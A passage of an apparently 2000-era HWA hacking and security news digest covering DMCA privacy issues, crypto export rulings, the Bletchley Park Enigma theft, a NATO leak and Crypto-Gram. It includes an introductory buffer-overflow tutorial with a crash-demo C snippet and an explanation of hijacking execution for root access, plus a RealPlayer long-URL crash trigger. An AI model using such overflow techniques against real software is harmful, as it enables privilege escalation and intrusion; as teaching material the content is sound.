Version 2.0 of Cisco Secure Policy Manager adds improved scalability and additional support for IPsec VPN configurations in Cisco's routers and firewalls. The Policy Manager lets IT managers define and audit network security policies from a central location, according to the company. The product also can simplify deployment of security services supported by Cisco's firewalls and IOS-based VPN routers, Cisco said. The Cisco Secure PIX Firewall 506 will be available in May, priced starting at $1,950. The Secure Policy Manager 2.0 will begin shipping this month, priced at $7,500. Cisco Systems Inc., in San Jose, Calif., is at www.cisco.com. Cathleen Moore is an InfoWorld reporter. @HWA 200.0 HNS:Apr 7th:COOKIES ~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 3:43 PM You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Wired has an article about it and we had a discussion on them on our forum. Link: Wired on cookies Link: HNS forum ____________________________________________________ http://www.wired.com/news/politics/0,1283,35498,00.html http://default.net-security.org/phorum/read.php3?num ---------- Getting Snooped On? Too Bad by Declan McCullagh 3:00 a.m. Apr. 7, 2000 PDT TORONTO -- You say you don't like browser cookies? You're not quite sure if that program you download from the Net is revealing more about you than it should? Well, here's something to make you really nervous: In the United States, it may be illegal to disable software that snoops on you. The folks who came up with this idea turn out to be the large corporations that helped to draft the Digital Millennium Copyright Act (DMCA), which restricts some forms of tampering with copyright protection devices. In some cases, that means you won't be able to turn off any surveillance features it might include, according to participants in a Thursday afternoon panel at the Computers, Freedom and Privacy conference. "Privacy circumvention is possible only under a limited circumstance," said Paul Schwartz of the Brooklyn Law School. As more and more copyrighted material makes its way online, content owners are turning to encryption to protect their works from widespread illicit redistribution. Stephen King distributed his recent novel online in encrypted form, and music companies are backing Secure Digital Memory Card for audio players. Privacy advocates fret that if future works are secure and thus protected under the DMCA, they could reveal consumers' private behavior --RealNetworks' RealJukebox player secretly did just that -- and tinkering with the program to turn off the reporting mechanism would be illegal. "The practical impact is it's another area we're going to be fighting about," Schwartz said. The DMCA, which became law in October 1998, does allow some very limited forms of privacy circumvention. You're allowed to do it if the software leaks "personally identifying information" about you without giving you the ability to say no, and if you're not "in violation of any other law." But here's the rub: Many, if not most, programs include shrink-wrap licenses that prohibit reverse-engineering or altering the program. Some courts have said that shrink-wrap licenses -- software license agreements that don't require a signature -- are binding. If you violate them, would you be able to take advantage of the DMCA's privacy-circumvention loophole? The answer may well be yes. "The statute is basically totally incoherent," says Pam Samuelson, a professor at the University of California at Berkeley and an influential copyright scholar. "We're getting tortured by laws that are inherently incoherent," complained Barry Steinhardt, associate director of the ACLU. Violating the DMCA is a civil offense, and "willfully" violating it for private financial gain is a criminal offense punishable by five years in jail and a $500,000 fine. (Cookies are a dead non-issue, get over it - Ed) @HWA 201.0 HNS:Apr 7th:SECURE E-MAIL SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 3:39 PM The Royal Mail has launched a secure e-mail service through its secure technology service, ViaCode. Link: Silicon.com ____________________________________________________ http://www.silicon.com/public/door?REQUNIQ ---------- @HWA 202.0 HNS:Apr 7th:ONLINE MUGGERS ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Friday 7 April 2000 on 3:38 PM "You are running a Web site. Making money perhaps, and visitors are seeing your message. Then, according to your perimeter intrusion-detection device, some online goofball or criminal hacker is beating on your door. What are you going to do?" Read Winn Schwartau's article. Link: IDG.net ____________________________________________________ http://www.idg.net/servlet/ContentServlet?global_doc_id ---------- We're sorry but we are currently unable to process your request. Please try again later. If you continue to get this message, please go to Feedback and let us know. We apologize for the inconvenience. (Guess they were mugged ... -Ed) @HWA 203.0 HNS:Apr 6th:SURVEY BY DTI ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 6 April 2000 on 3:00 PM British companies are too complacent when it comes to Internet security and only have themselves to blame if their IT systems are compromised by hackers. That is one of the conclusions published by Department of Trade and Industry. Contributed by Lady Sharrow. Link: The Register ____________________________________________________ http://www.theregister.co.uk/000406-000023.html ---------- Printed elsewhere @HWA 204.0 HNS:Apr 6th:COMPUTER CODES PROTECTED ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 6 April 2000 on 1:58 PM Computer programs used to scramble electronic messages are protected by the First Amendment because those codes are a means of communication among programmers, a federal appeals court ruled Tuesday. Link: Associated Press ____________________________________________________ http://www.worldnews.com/?action ---------- bad url Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, will@sowerbutts.com and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log. (sourbutts? LOL - Ed) @HWA 205.0 HNS:Apr 6th:RELEASED AFTER CODE MACHINE THEFT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 6 April 2000 on 1:57 PM A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine. Link: BBC ____________________________________________________ http://news.bbc.co.uk/hi/english/uk/newsid_701000/701877.stm ---------- Wednesday, 5 April, 2000, 12:53 GMT 13:53 UK Man released after code machine theft Bletchley Park: Centre for wartime code-breaking effort A 50-year-old man has been released on police bail after being questioned by detectives investigating the disappearance of the Enigma encoding machine. The man, from Bedfordshire, was arrested on Tuesday and released after questioning at Milton Keynes police station. Police have mounted a massive search for the historic machine, which cracked the Nazi Enigma code during the Second World War. It was stolen in broad daylight from a glass cabinet at the Bletchley Park museum on Saturday, where it was on display. Police officers were preparing to trawl a lake on the estate and search the mansion. Thames Valley Police spokesman John Brett said: "A search of the mansion and the grounds of Bletchley Park will start under the supervision of a police search adviser and a team of 10 police officers. The missing Enigma machine "There is a possibility that a Thames Valley Police underwater search unit may be used to search the lake in Bletchley Park. "It could be hidden under the stairs in the mansion, there are lots of places it could be." Detectives think the thief could have abandoned the Enigma machine within the 50-acre grounds of the estate, or in one of the 70 rooms in the mansion. The museum in Milton Keynes, Buckinghamshire, was raided in full view of visitors during an open day on Saturday. The Enigma - one of only three in the world - is worth up to Ł100,000 and was used by the Germans to encrypt messages sent during the Second World War. Bletchley Park is believed to have shortened the war by cracking the code. Detectives were appealing for any visitors on Saturday who took pictures or video footage to contact police in the hope they might identify the thief. Reward offered Mr Brett urged whoever stole the machine not to be tempted to destroy the evidence in the light of massive publicity. He added: "If it's a prank that's gone wrong, don't destroy it because our main priority is getting it back." A Ł5,000 reward is being offered by BT, owners of part of the site in Milton Keynes since World War II. "It is a tragedy that the machine has been stolen," Alan White, director of BT's property division, said. @HWA 206.0 HNS:Apr 6th:CYBERPATROL BLOCK LIST ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Thursday 6 April 2000 on 1:36 PM Our affiliates at Security Watch wrote that a list of thousands of hosts, websites and Usenet groups blocked by Microsystems Software Inc.'s CyberPatrol software has been published on the web. Link: Security Watch ____________________________________________________ http://www.securitywatch.com/scripts/news/list.asp?AID ---------- @HWA 207.0 HNS:Apr 5th:CRYPTO REGULATIONS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 5 April 2000 on 12:27 PM Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. Link: Wired ____________________________________________________ http://www.wired.com/news/politics/0,1283,35425,00.html ---------- Crypto Regs Challenged Again by Declan McCullagh 4:00 p.m. Apr. 4, 2000 PDT Privacy advocates won a preliminary victory when for the second time a federal appeals court questioned restrictions on data-scrambling encryption software. The Sixth Circuit Court of Appeals suggested Monday that President Clinton's restrictions on distributing encryption products might be unconstitutional. "Because computer source code is an expressive means for the exchange of information and ideas about computer programming, we hold that it is protected by the First Amendment," a three-judge panel said in a unanimous 17KB decision. That decision reversed a July 1998 ruling by a federal district court. And while the panel did not strike down the Clinton administration's regulations, it did refer the matter back to U.S. District Judge James Gwin for another hearing. Earlier Gwin had ruled the First Amendment did not apply. The Justice Department says source code is akin to instructions for a machine, and rules governing its distribution are necessary for national security reasons. Now that the appeals court has ruled source code is protected by the First Amendment, the government will have a much tougher time arguing it should have the power to imprison a law professor for posting a book on his website. Peter Junger, a professor at Case Western University School of Law, sued the federal government after it told him he needed a license to post a chapter of his Computers and the Law textbook online. The American Civil Liberties Union, which represents Junger, applauded the ruling. "This is a great day for programmers, computer scientists and all Americans who believe that privacy and intellectual freedom should be free from government control," said ACLU Legal Director Raymond Vasvari. In a separate case that also challenges the criminal penalties the U.S. government imposes for unauthorized encryption distribution, the 9th U.S. Circuit Court of Appeals in May 1999 ruled that encryption source code was speech protected by the First Amendment. "We conclude that the challenged regulations allow the government to restrain speech indefinitely with no clear criteria for review," the 9th Circuit panel said in its decision in a case brought by math professor Daniel Bernstein. But it's not clear what happens next in either the Junger or Bernstein cases. The Clinton administration relaxed the regulations in January, and the move is likely to delay both lawsuits for some time. In fact, the Commerce Department, which administers the regulations, says that Bernstein no longer has anything to worry about. "You ask for an advisory opinion in light of your concern that the new regulations 'continue to interfere with Professor Bernstein's planned scientific activities.' Your concerns are unfounded," a Commerce Department Bureau of Export Administration official wrote to Bernstein's lawyers in February. Bernstein asked in March for a rehearing by the district court to take into account the regulation changes. @HWA 208.0 HNS:Apr 5th:GFI AND NORMAN TEAM UP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 5 April 2000 on 12:24 PM GFI and Norman have teamed up to integrate the Norman Virus Engine with GFI's e-mail security gateway, Mail essentials. Link: ESJ ____________________________________________________ http://www.esj.com/breaknewsdisp.asp?ID ---------- @HWA 209.0 HNS:Apr 5th:MASTERCARD OFFER VIRUS REPAIR SERVICE ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 5 April 2000 on 12:23 PM MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package. Link: Computer Currents ____________________________________________________ http://www.currents.net/newstoday/00/04/05/news5.html ---------- Daily News MasterCard Offers Virus Repair Service By Steve Gold, Newsbytes April 05, 2000 MasterCard has taken the unusual step of offering a free virus repair service as a key feature in its small business card package. The card issuer has tapped Vipro Corp., for the service, which is available to all MasterCard Executive BusinessCard holders. For those cardholders that require the service, MasterCard is offering Vipro's Virus Service Plan (VSP), a normally paid-for facility, free of charge to BusinessCard holder. Vipro's Virus Service Plan is billed as providing computer users "coverage" from destructive viruses. If a virus damages a plan holder's computer, Vipro will repair it at no charge to the member. The service, which is designed for consumers and small business owners, includes a copy of Norton AntiVirus as standard, as well as online and telephone technical support. In the event that Norton AntiVirus and/or support from a telephone tech support person cannot assist the user in getting his/her PC back up and running, Vipro says it has a network of more than 7,000 local repair centers available across the US. Bernie Brenner, Vipro's president, said that small businesses are extremely vulnerable to computer virus attacks. "As more businesses plug into the Internet and conduct more of their day-to-day business transactions online, the chance of a virus attack increases," he said. Newsbytes notes that the MasterCard Virus Service Plan is included free as a MasterCard Executive BusinessCard benefit and includes free virus repair reimbursement, Web technical support, a three-month trial of Norton Antivirus, telephone technical support, and access to the online virus resource center. MasterCard's Web site is at http://www.mastercard.com . Vipro's Web site is at http://www.vipro.com . Reported by Newsbytes.com @HWA 210.0 HNS:Apr 5th:BUFFER OVERFLOWS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Wednesday 5 April 2000 on 3:12 AM A survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem. Read new Default article which deals with buffer overflows. Link: Default ____________________________________________________ http://net-security.org/default/articles/09/02.shtml ---------- DEFAULT ARTICLES Smashing the what?? An introduction to the memory buffers and a explanation of their possible uses as weaknesses -- by Thejian Introduction A survey held amongst readers of the security/vulnerability report list "Bugtraq" a few months ago approximately 2/3 of the respondents thought the so-called "buffer overflows" to be the dominating security problem. (http://immunix.org/SlackGuard/discex00.pdf) When you troll through the messages and advisories on this same list, you indeed get the impression this might not be to far from the truth since the lil' boogers are mentioned everywhere. In the following article I'll try to explain a bit more about the way memory is handled on a system and how these buffer problems can be used to exploit it. Most of the various files floating around out there however require quite a background in programming etc to understand, I'll try to make this understandable even for those of you who do not exactly meet that requirement (maybe particularly those of you). I hope to make "simplify" not "dumbify" however, but still this is just a basic approach, useful as an introduction to the more technical texts by individuals as dr Mudge, Elias Levy (Aleph One) and many others (see bibliography). So if you were born with pure ASM running through your veins you might want to look elsewhere, if however you're just the average enthusiast wanting to know what all those "elite" people are talking about, do read on :) What are these "buffers" you keep talking about? A computer program basically is a set of instructions and requests. This can easiest be illustrated in form of the famous "if-then-else" loop. An instruction is run, resulting in variables which decide the course of the program while the follow-up instructions are ran. A buffer (in programming) is an area in the memory shared by different processes on the system. Basically a buffer makes it possible to make different processes run simultaneously without holding each other up or to hold data in a place where it can be manipulated before its moved to a file. The program also needs a way to "remember" how to follow-up when the current instruction is done, what to do next. This is where the "Stack" comes in. The what?? The Stack (or "push-down list") is a (dynamicly) growable area of the memory where when a program is executed, it dumps its data (variables, memory addresses etc), which gets manipulated by whatever rules and algorithms are present/appliable and then continues. Then the "next to-do" instruction is taken from the top of the Stack and executed. "From the top" might give you the impression this process is defined by means of a predestined orderly list of any kind. The way how this actually works however, is that the last instruction passed on to the system to be executed ends up on top of the stack, so you could say it works in a "last in - first out" manner. The top and bottom of the stack are defined by the Stack pointer (which holds the memory address to where the top of the Stack can be found) and the Base pointer (which obviously is the other one, pointing at the bottom or base of the Stack). Contrary to what might seem logical, the number associated with the memory addresses start at the bottom of the stack (hence the "base") and start counting up. Because of this, generally programs refer to the BP for the location of their data. This means the start of an 10 character instruction is not called as SP + 1 but as BP -11 (or actually BP +11 because of the numbers counting up "backwards"). The Buffer Overflow As said before, a buffer is an area shared by different processes. Obviously there is a need for a certain flexibility here, to allow this changing of different processes to actually happen and to allow it to be called from different positions in the program. These buffers are subject to certain rules though and overflowing them is nothing more than the word says, breaking those rules by filling up a buffer by putting more in it than fits in. (think of trying to hammer the triangle into the mold of a circle :) An example: (part of in the bibliography mentioned doc on the writing of Buffer Overflows by dr. Mudge of L0pht Heavy Industries) --------syslog_test_1.c------------ #include char buffer[4028]; void main() { int i; for (i=0; i<=4028; i++) buffer[i]='A'; syslog(LOG_ERR, buffer); } --------end syslog_test_1.c---------- What happens here is that the buffer, which is set to contain 4028 characters is filled with A's as long as the amount of A's is smaller than or equals 4028. Obviously the set buffer size eventually is exceeded, causing the buffer to "overflow". The system returns: Program received signal 11, Segmentation fault 0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141) or pops up something like the following:[ (when in Windows) "The Instruction at '0x1273' referenced memory at '0x41414141'. The memory could not be read." Here the second line tells us a number of things as the location where it crashed. The 41's you see are the hex equivallent for the ascii character 'A'. Gee that's nice.. but what can I do with it? Most network/server systems manage a variety of different accounts to keep track of which user is where doing what and to make sure no user could have access to things (be it files or processes/services) he or she shouldn't have. Obviously the accounts with the higher privileges are the ones the most interesting because they give access to and allow manipulation/execution of a lot more things. What you'd want to do is to exploit an Buffer Overflow in something (program/service/etc) ran by one of these accounts, allowing you to change the position indicating the "next-to-do" instruction and possibly allowing you to execute your own code. By overwriting this pointer with (enough of) the value you use to overflow the buffer, the program is redirected to (when using the A's mentioned in the above example) address 0x41414141 and executing the instructions it finds there. The beauty of this all is that these instructions are run with the privileges of the account which process you interrupted. This way you could pop up a command prompt as root or run code you wrote/uploaded on another account with the privileges of the administrator. Imagine the possibilities :) So as Mudge says, "put on those warp refraction eye-goggles and on we go" ! The more technical side (or: Bibliography) Now you have a bit of an understanding as to what buffer overflows actually are and how they work, or at least so I hope. If you got the taste for it now, or just want to experiment, you now might want to move on to the next mentioned files: "Smashing The Stack For Fun And Profit", Elias Levy(Aleph One) http://www.phrack.com/search.phtml?view&article=p49-14 "How to write Buffer Overflows", dr. Mudge ftp://ftp.technotronic.com/rfc/bufferoverflows.html "The Tao of the Windows Buffer Overflow", Dildog http://www.cultdeadcow.com/cDc_files/cDc-351/index.html "Exploiting Windows NT4 Bufferoveruns; a case study: RASMAN.EXE", David Litchfield http://packetstorm.securify.com/9905-exploits/ntbufferoveruns.txt "W00w00 on Heap Overflows", w00w00 security http://packetstorm.securify.com/docs/infosec/buffer-overflows/w00w00-heap- overflows.txt @HWA 211.0 HNS:Apr 5th:PIRACY ~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Wednesday 5 April 2000 on 12:11 AM Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers. Link: APB News ____________________________________________________ http://www.apbnews.com/newscenter/internetcrime/2000/04/04/software0404_01.html ---------- Microsoft's Home State Cracks Down on Piracy Washington Governor's Order Targets Software Copying April 4, 2000 By David Noack OLYMPIA, Wash. (APBnews.com) -- Washington state, with an economy that has boomed along with Microsoft's, has launched a crackdown on state employees who illegally circulate pirated software on government computers. Gov. Gary Locke signed an executive order Monday aimed at preventing the illegal acquisition and distribution of programs using state equipment or funds. "We are working diligently to combat computer software piracy," Locke said. "As a major purchaser and user of computer software, Washington state government must set an example in acquiring and using legally licensed software." Washington now becomes the fourth state to issue strict policies and guidelines dealing with software piracy in state government. The other states are California, Nevada and Colorado. The executive order The executive order directs all state agencies to take the following actions: Adopt procedures to prevent the unlawful acquisition, reproduction, distribution or transmission of computer software Establish procedures to ensure that computer software use complies with the law Take appropriate measures if contractors or financial assistance recipients use state funds to acquire, operate or maintain illegal software. In addition to the illegality of having pirated software, Locke also cited economic concerns for issuing the order. Estimates of 4,000 jobs lost "Illegal software use has a very damaging impact on Washington's economy," Locke said. "We cannot tolerate counterfeiters who try to make a quick buck by pawning illegal software to honest consumers at the expense of Washington's taxpayers." Computer industry estimates show pirated software costs Washington's economy almost 4,000 jobs annually and more than $200 million in lost wages. The state is home to more than 7,000 high-technology businesses, including software developers, software training groups, and software and hardware service organizations. These businesses employ more than 76,000 people and pay more than $3.7 billion in annual wages. Computer trade associations such as the Software Information Industry Association (SIIA) and the Business Software Alliance (BSA) have long argued that software piracy costs the industry billions annually and have called for more software auditing. Peter Beruk, vice president of anti-piracy programs at the SIIA, said that an executive order dealing with software piracy sends a message to the state bureaucracy that this kind of behavior won't be tolerated. "It helps having a governor issuing an executive order like this," Beruk said. "It puts notice on people who are responsible for this to do the right thing. It gives them, the people actually responsible for doing this, ... an important job. The governor has directed us to do this." Officials from the Microsoft Corp. and Adobe Systems Inc. were quick to applaud the governor's actions to protect intellectual property rights in Washington state. On the federal level, President Clinton issued a national executive order against software piracy in October 1998, and other countries around the globe ranging from China to Norway to Colombia have issued such intellectual property directives. A leadership role Locke will speak about the executive order today at a meeting of the Government Leaders Conference, where, in an address on "Digital Government," he will highlight why the protection of intellectual property is important in today's economy. "We're encouraged to see Washington continue to take a state leadership role in addressing the issue of intellectual property rights, as both consumers and governments move into the digital era where the online world becomes the norm for business transactions," said Anne Murphy, corporate attorney at Microsoft. The head of Washington's software industry also backed the governor's efforts to protect intellectual property. "Much focus over the years has been about foreign software piracy, obscuring the fact that piracy is a rampant domestic issue," said Kathleen Wilcox, president and chief executive officer of the Washington Software Alliance. Approximately 20 percent of the software used in Washington -- one out of every five copies -- has been illegally copied, according to a 1998 study by International Planning & Research Corp. Pirate targets Experts said that governments are often targets for software pirates, mainly due to the low-bid government procurement processes in place. Because many illegitimate software manufacturers now advertise their products over the Internet -- where it is more difficult for consumers to distinguish genuine from illegal software -- it has become increasingly easy for customers at all levels to be deceived into believing that they are acquiring genuine software. "Washington state residents clearly don't want their taxpayer dollars going toward pirated software or the organized crime rings that could be distributing it," Microsoft's Murphy said. Last month, Colorado Gov. Bill Owens issued an executive order dealing with the use of legal, licensed computer software throughout the state government. The order applies to all state agencies, as well as all third parties doing business with the state. "Government agencies are among the largest users of computer software and must set a positive example by mandating the use of legal and licensed software," said Becca Gould, the Business Software Alliance's vice president of public policy. According to the Business Software Alliance, the use of illegal software costs nearly $11 billion annually -- $2.8 billion in the United States alone. In 1998, proliferation of illegal software in the United States resulted in the loss of 109,000 jobs, $4.5 billion in wages and nearly $991 million in tax revenue. According to a recent industry study, the piracy rate in Colorado is 27 percent, resulting in lost jobs and tax revenues throughout the state. David Noack is an APBnews.com staff writer (david.noack@apbnews.com) @HWA 212.0 HNS:Apr 5th:BIGGEST PUBLIC-KEY CRYPTO CRACK EVER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Wednesday 5 April 2000 on 12:05 AM Certicom's ECC2k-108 Elliptic Curve Discrete Logarithm challenge has been broken! This was the largest public calculation ever to use a complex parallel algorithm. $5,000 dollars in winnings will be donated to the Free Software Foundation. Link: Slashdot ____________________________________________________ http://slashdot.org/article.pl?sid ---------- (article vanished or like has gone or some shit - Ed) @HWA 213.0 HNS:Apr 5th:GROUP APPEALS DVD CRYPTO INJUNCTION ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Wednesday 5 April 2000 on 12:02 AM Continuing its California courtroom battle against the Digital Video Disk industry over DVD encryption codes, the Electronic Frontier Foundation has appealed an injunction granted against more than 50 Web site operators in January. Link: Computer User ____________________________________________________ http://www.currents.net/newstoday/00/04/04/news7.html ---------- @HWA 214.0 HNS:Apr 5th:VIRUS BLOWS A HOLE IN NATO'S SECURITY ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by LogError Wednesday 5 April 2000 on 12:01 AM The North Atlantic Treaty Organization has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net. Link: Computer User ____________________________________________________ http://www.currents.net/newstoday/00/04/04/news3.html ---------- Daily News Virus Blows a Hole in NATO's Security By Steve Gold, Newsbytes April 04, 2000 The North Atlantic Treaty Organization (NATO) has launched a full-scale investigation into how one of its top-secret documents ended up posted on the Internet. The Sunday Telegraph reports that an unknown virus is to blame for the posting of the nine-page document, detailing the alliance's rules of engagement in the southern Yugoslav province of Kosovo, on to the Net. Press reports this morning say that NATO moved into full swing over the weekend after the British Ministry of Defence was alerted to the problem late last week. The Sunday Telegraph said that the top secret document was spotted by a London publishing house and reported to the relevant authority. BBC news reports today, meanwhile, say that a virus may be to blame. NATO's Brussels headquarters said that a press briefing for the media is expected later today. The Sunday Telegraph, meanwhile, quotes Jamie Shea, a senior spokesperson for NATO, as saying that, if the investigation shows that a NATO document has got into the public domain, "it will be a matter of great concern to us." He added, "These are sensitive NATO documents. We would like to keep them classified and prevent them being compromised." Newsbytes' sources say that the document posted to the Net included NATO's Rules of Engagement for Land Operations, which cover the circumstances under which "appropriate measures, including the use of deadly force," may be used. The Sunday Telegraph quotes an unnamed person at the London Publishing company as saying that two people tried to open up a new document on a PC and, instead, the NATO Kosovo document started to scroll up. "The next thing I knew, I was in a meeting around lunchtime when a message came from reception saying, `Your guests have arrived.'" On returning to work, the member of staff was interviewed by two military intelligence officers in plain clothes, who said words to the effect of, "'This is something we are very worried about,' and started to ask questions." Newsbytes' sources suggest that the NATO document was top secret classified material, but the classification was changed to "restricted" over the weekend to prevent further embarrassment. Sources also suggest that the document was posted to a Usenet group, but was quickly deleted by a Ministry of Defence autobot, a software agent that autodeletes questionable Usenet postings from the servers of Usenet-enabled Internet service providers (ISPs) around the world. Graham Cluley, head of corporate communications with Sophos Anti- Virus, was not surprised by the reports that a virus is to blame for the NATO security breach. He pointed to worm payloads such as the infamous Melissa virus as indicative of how easy it is to trigger an Internet posting without the permission of the host PC operator. "These latest security breaches highlight that no one is immune to security scares in any form," he said, adding that, if NATO can be hit by a virus, "then it should serve as a salutary reminder to all of us that we all need to be vigilant against computer crime and ensure the deployment of quality, up-to-date anti-virus and encryption software. "In this particular case, NATO has suffered an embarrassment, but viruses like Melissa have already shown us how it is possible for a virus to pass on confidential material to thousands via just a few hops in an e-mail address book," he said. "Perhaps more troubling though, is the fact that these viruses appear to be causing much more serious harm than a virus whose payload is a playful cartoon or Dr. Who quote," he added. Sophos' Web site is at http://www.sophos.com . Reported by Newsbytes.com @HWA 215.0 HNS:Apr 4th:FIGHT SPAM WITH SPAM ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Tuesday 4 April 2000 on 8:40 AM Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails. This was taken from booklet 'The Easy Guide to Network Security', which could be downloaded from their UK site. Link: The Register ____________________________________________________ http://www.theregister.co.uk/000404-000001.html ---------- (Now this is a real dumb thing for a reputable company to suggest ... - Ed) Posted 04/04/2000 7:02am by Tim Richardson Cisco tells spam victims to reply with abusive emails Cisco Systems is urging victims of spam to take the law into their own hands and deliver their own form of vengeance to combat unwanted e-mails. It claims the best way to deal with spammers is to reply with abusive e-mails and to dump massive files that will clog up their servers. It's the online equivalent to blowing a whistle down the phone line when dealing with nuisance calls - or flicking the Vs at a motorist before chasing them for five miles after they've carved you up. The advice is contained in a booklet The Easy Guide to Network Security, which is also published in an ungainly PDF file on Cisco's UK Web site. Under the heading "Spam", it reads: "Spam is usually harmless, but it can be a nuisance, taking up time and storage space. The solution is to flame the perpetrators by sending them abusive messages, or to reply by dumping a very large and useless file on their Web server." It's not clear whether this is a corporate-wide policy or just applies to the hard noses in Britain. It's certainly a different approach from that pursued by British ISP, BiblioTech, which goes to extreme lengths to chase spammers through the courts. Question is, have you received any spam from Cisco? If so, sounds like they're inviting you to take action. And if you can orchestrate it with other spam victims, then you could even manufacture a denial of service attack. ® @HWA 216.0 HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ by BHZ Tuesday 4 April 2000 on 8:10 AM There is a buffer overflow in the Win32 RealPlayer Basic client, versions 6 and 7. This appears to occur when >299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embed in an html page Internet Explorer alos crashes. Link: Bugware ____________________________________________________ 299 characters are entered as a 'location' to play, such as http://aaaaa..... with 300 a's. If it is embed in an html page Internet Explorer alos crashes. http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,3289 8, ---------- @HWA 217.0 ISN:Mar 18th:Serbs hacked Britain's top-secret military computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: William Knowles Sounds like complete FUD to me, But I wouldn't put it past any country nowadays. -WK http://express.lineone.net/express/00/02/27/news/n0220serb-d.html By Ken Hyder and Nick Anning Serb experts hacked into Britain's top-secret military computer systems during the Kosovo conflict last year, the Sunday Express has learned. In response, MI5 has been put in charge of improving Britain's defences against cyber attack. It is understood that both sides engaged in covert cyber war alongside the conventional warfare and that British agents successfully hacked into Serb computers. Both sides tried to plant computer viruses into military systems. The Serb attacks focused on computers handling the messaging systems used by the Ministry of Defence to communicate between headquarters in the UK and military units in the field. The cyber strike persuaded the Government that an all-out attack on our computer systems could bring the country to a standstill. Working alongside MI5 are computer experts from GCHQ in Cheltenham, specialist army units such as the SAS, and highly experienced private sector consultants. The police National Crime Squad will also be involved. A source admitted: "This kind of warfare is a deadly innovation. One super-hacker with just a laptop and mobile phone could wreak an amazing amount of damage in minutes. There are so many targets for us to defend - but the enemy hacker just needs to pick one and succeed."The SAS has carried out dummy attacks on key installations such as the National Grid and air-traffic control. Now, as well as testing out a location's physical defences, they take a civilian computer specialist with them. ISN is sponsored by Security-Focus.COM @HWA 218.0 March 15th: CRYPTOGRAM newsletter ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: Bruce Schneier CRYPTO-GRAM March 15, 2000 by Bruce Schneier Founder and CTO Counterpane Internet Security, Inc. schneier@counterpane.com http://www.counterpane.com A free monthly newsletter providing summaries, analyses, insights, and commentaries on computer security and cryptography. Back issues are available at http://www.counterpane.com. To subscribe or unsubscribe, see below. Copyright (c) 2000 by Counterpane Internet Security, Inc. ** *** ***** ******* *********** ************* In this issue: Kerberos and Windows 2000 Counterpane -- Featured Research News AES News Counterpane Internet Security News Software as a Burglary Tool The Doghouse: The Virginia Legislature Software Complexity and Security Comments from Readers ** *** ***** ******* *********** ************* Kerberos and Windows 2000 Kerberos is a symmetric-key authentication scheme. It was developed at MIT as part of their Project Athena in the 1980s -- the protocol was published in October 1988 -- and has been implemented on various flavors of UNIX. The current version is Kerberos Version 5, which corrected some security vulnerabilities in Version 4. It's never taken over the authentication world, but it is used in many networks. These days, the Internet Engineering Task Force (IETF) controls the specification for Kerberos. Kerberos is a client-server authentication protocol. (_Applied Cryptography_ goes into the protocol in detail.) For the point of this article, remember that there is a secure Kerberos server on a network. Clients log into the Kerberos server and get secure "tickets." The clients can use these tickets to log onto other servers on the network: file servers, databases, etc. Kerberos is now part of Microsoft Windows 2000, sort of. The issue is that Microsoft has made changes to the protocol to make it noninteroperable with the Kerberos standard, and with any products that implement Kerberos correctly. Specifically, the incompatibility has to do with something called the "data authorization field" in the Kerberos messages. All major Kerberos implementations leave the field blank. The new Microsoft implementation does not; it uses the field to exchange access privileges between the Kerberos server and the client. There are two ways to look at this: o Since the field has no specific uses in the protocol (and no one else uses it), the fact that Microsoft is using the protocol is harmless. o Because Microsoft is refusing to publish details 